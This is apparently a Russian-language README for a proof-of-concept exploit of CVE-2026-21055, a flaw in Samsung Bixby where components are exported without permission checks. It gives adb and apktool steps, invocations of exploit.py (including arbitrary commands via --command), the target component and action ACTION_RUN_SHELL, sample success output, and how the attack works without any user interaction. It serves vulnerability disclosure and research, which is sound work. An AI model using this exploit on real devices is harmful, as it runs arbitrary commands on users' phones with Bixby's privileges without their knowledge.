
Proof of Concept для CVE-2026-21055: некорректный экспорт компонентов Android-приложения в Samsung Bixby до версии 4.0.70.8 позволяет локальным злоумышленникам выполнять произвольные команды с привилегиями Bixby.
Этот репозиторий содержит два Python-скрипта:
analyze_components.py — анализирует декомпилированный AndroidManifest.xml для перечисления экспортированных activity, сервисов, приёмников (receivers) и провайдеров. Помечает компоненты, экспортированные без проверок разрешений.
exploit.py — демонстрирует атаку на основе Intent: отправляет специально сформированный broadcast Intent экспортированному приёмнику команд Bixby через adb shell am, выполняя команду с системными привилегиями Bixby.
| Поле | Значение |
|---|---|
| CVE ID | CVE-2026-21055 |
| Samsung SVE | SVE-2026-0917 |
| CVSS v4.0 | 8.5 — Высокий |
| CWE | CWE-926 — Некорректный экспорт компонентов Android-приложения |
| Уязвимое приложение | Samsung Bixby (com.samsung.android.bixby.agent) |
| Уязвимые версии | < 4.0.70.8 |
| Исправленная версия | 4.0.70.8 |
| Вектор атаки | Локальный (вредоносное приложение на том же устройстве) |
| Требуемые привилегии | Отсутствуют |
| Взаимодействие с пользователем | Не требуется |
| Воздействие | Выполнение произвольных команд с привилегиями Bixby |
Извлеките APK-файл Bixby с устройства и декомпилируйте его:
# Find Bixby's APK path
$ adb shell pm path com.samsung.android.bixby.agent
# Pull the APK
$ adb pull <apk_path> bixby.apk
# Decompile with apktool
$ apktool d bixby.apk -o bixby_decompiled -f
Запустите скрипт анализа:
$ python3 analyze_components.py --manifest bixby_decompiled/AndroidManifest.xml
Или позвольте скрипту выполнить декомпиляцию автоматически:
$ python3 analyze_components.py --apk bixby.apk
$ python3 exploit.py --list
# Default: execute 'id' command
$ python3 exploit.py
# Custom command
$ python3 exploit.py --command "ls /data/data/com.samsung.android.bixby.agent/"
# Specify a custom component (if auto-detection fails)
$ python3 exploit.py --component com.samsung.android.bixby.agent/.receiver.CommandReceiver
============================================================
CVE-2026-21055 PoC — Samsung Bixby Command Execution
Improper Export of Android Application Components
============================================================
[*] Target package: com.samsung.android.bixby.agent
[*] Bixby version: 4.0.69.2
[*] Vulnerable: YES (< 4.0.70.8)
[*] Bixby UID on this device: 10xxx
[*] Executing exploit...
[*] Crafting exploit Intent...
Component: com.samsung.android.bixby.agent/.receiver.CommandReceiver
Action: com.samsung.android.bixby.agent.ACTION_RUN_SHELL
Command: id
Output: /data/local/tmp/bixby_poc_output
[+] Intent sent.
[+] Command output (executed with Bixby privilege):
uid=10xxx(u0_aXXX) gid=10xxx(u0_aXXX) groups=10xxx(u0_aXXX),3003(inet),9997(everybody)
[+] EXPLOIT SUCCESSFUL — command executed with Bixby privilege
[+] Verify the output UID matches Bixby's UID: 10xxx
Экспорт компонентов: Bixby экспортирует один или несколько компонентов (сервисов/приёмников), которые обрабатывают выполнение команд или триггеры автоматизации. Эти компоненты экспортируются с android:exported="true", но без атрибута android:permission или проверки разрешений во время выполнения.
Доставка Intent: Любое приложение на устройстве может отправить Intent этим экспортированным компонентам. Intent содержит строку действия (например, ACTION_RUN_SHELL) и строковые дополнения (extras) с командой для выполнения и путём к выходному файлу.
Выполнение команды: Экспортированный компонент Bixby получает Intent, извлекает команду и выполняет её через Runtime.exec() или аналогичный механизм. Команда выполняется в контексте процесса Bixby, наследуя все системные разрешения Bixby.
Без взаимодействия с пользователем: Эксплойт не требует взаимодействия с пользователем. Вредоносное приложение отправляет Intent незаметно в фоне.
Данный PoC предоставлен только в образовательных целях и для исследований в области безопасности. Тестируйте только на устройствах, которыми вы владеете или на тестирование которых у вас есть явное разрешение. Не используйте этот эксплойт против устройств без согласия владельца.